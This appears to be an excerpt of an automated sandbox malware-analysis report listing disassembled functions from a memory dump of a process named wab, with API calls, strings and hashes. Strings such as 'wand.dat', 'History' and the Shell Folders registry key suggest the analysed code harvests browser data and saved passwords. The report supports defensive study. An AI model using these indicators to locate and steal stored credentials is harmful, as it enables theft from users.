                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                  • API String ID: 2221118986-1606337402
                                                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                  • String ID:
                                                  • API String ID: 265355444-0
                                                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                  APIs
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                  • memset.MSVCRT ref: 0040C439
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  • memset.MSVCRT ref: 0040C4D0
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                  • String ID:
                                                  • API String ID: 1973883786-0
                                                  • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                  • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                  APIs
                                                  • memset.MSVCRT ref: 004116FF
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  APIs
                                                  • memset.MSVCRT ref: 004185FC
                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@AttributesFilememset
                                                  • String ID:
                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                  • malloc.MSVCRT ref: 00417524
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                  • String ID:
                                                  APIs
                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PathTemp$??3@
                                                  • String ID: %s\etilqs_$etilqs_
                                                  APIs
                                                  • memset.MSVCRT ref: 0040FDD5
                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0041477F
                                                  • wcscpy.MSVCRT ref: 0041479A
                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                  • String ID: General
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastMessage_snwprintf
                                                  • String ID: Error$Error %d: %s
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: foreign key constraint failed$new$oid$old
                                                  APIs
                                                  Strings
                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: gj
                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                  • malloc.MSVCRT ref: 004174BD
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                  • String ID:
                                                  APIs
                                                  • GetParent.USER32(?), ref: 0040D453
                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • memset.MSVCRT ref: 004450CD
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                    • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                  • String ID:
                                                  APIs
                                                  • wcscpy.MSVCRT ref: 0044475F
                                                  • wcscat.MSVCRT ref: 0044476E
                                                  • wcscat.MSVCRT ref: 0044477F
                                                  • wcscat.MSVCRT ref: 0044478E
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                  • String ID: \StringFileInfo\
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$??3@
                                                  • String ID: g4@
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _memicmpwcslen
                                                  • String ID: @@@@$History
                                                  APIs
                                                  • memset.MSVCRT ref: 004100FB
                                                  • memset.MSVCRT ref: 00410112
                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                  • _snwprintf.MSVCRT ref: 00410141
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                  • String ID: </%s>
                                                  APIs
                                                  • memset.MSVCRT ref: 0040D58D
                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                  Similarity
                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                  • String ID: caption
                                                  APIs
                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                  • String ID: MS Sans Serif
                                                  APIs
                                                  Similarity
                                                  • API ID: ClassName_wcsicmpmemset
                                                  • String ID: edit
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                  APIs
                                                  Similarity
                                                  • API ID: memcpy$memcmp
                                                  APIs
                                                  Similarity
                                                  • API ID: memset$memcpy
                                                  APIs
                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                  Similarity
                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                  Similarity
                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                  APIs
                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                  • memcpy.MSVCRT ref: 0042EC7A
                                                  Strings
                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                  APIs
                                                  • memset.MSVCRT ref: 0040560C
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                  • String ID: *.*$dat$wand.dat
                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • wcslen.MSVCRT ref: 00410C74
                                                  • _wtoi.MSVCRT ref: 00410C80
                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                  Similarity
                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                  APIs
                                                  • memset.MSVCRT ref: 00412057
                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                  Similarity
                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                  • memcpy.MSVCRT ref: 0040A94F
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  APIs
                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                  • memcpy.MSVCRT ref: 0040B248
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                  APIs
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: @
                                                  APIs
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  APIs
                                                  • strlen.MSVCRT ref: 0040B0D8
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                  • memcpy.MSVCRT ref: 0040B159
                                                  Similarity
                                                  • API ID: ??3@$memcpy$mallocstrlen
                                                  • String ID:
                                                  APIs
                                                  • memset.MSVCRT ref: 004144E7
                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                  • memset.MSVCRT ref: 0041451A
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                  • String ID:
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: sqlite_master
                                                  APIs
                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                  • String ID:
                                                  APIs
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                  • wcscat.MSVCRT ref: 0041101F
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                  • String ID:
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7726DF80,?,0041755F,?), ref: 00417452
                                                  • malloc.MSVCRT ref: 00417459
